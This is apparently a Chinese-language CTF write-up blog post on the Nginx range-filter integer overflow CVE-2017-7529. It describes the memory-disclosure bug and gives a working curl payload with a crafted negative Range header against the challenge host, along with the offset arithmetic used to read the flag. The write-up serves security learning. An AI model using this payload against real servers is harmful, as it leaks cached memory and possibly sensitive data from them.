Nginx整数溢出漏洞 Writeup

Nginx整数溢出漏洞 CVE-2017-7529

题目URL：http://www.whalwl.site:8040/

漏洞描述

在 Nginx 的 range filter 中存在整数溢出漏洞，可以通过带有特殊构造的 range 的 HTTP 头的恶意请求引发这个整数溢出漏洞，并导致信息泄露。

扩展阅读
Nginx 整数溢出(CVE-2017-7529)漏洞分析
 CVE-2017-7529 poc

payload：
curl -i http://www.whalwl.site:8040/proxy/demo.png -r -17190,-9223372036854758618 > poc.txt
偏移 605可读取flag
17190=16585+605

posted @ 2021-08-14 23:34 jzking121 阅读(673) 评论(0) 编辑收藏举报

刷新页面返回顶部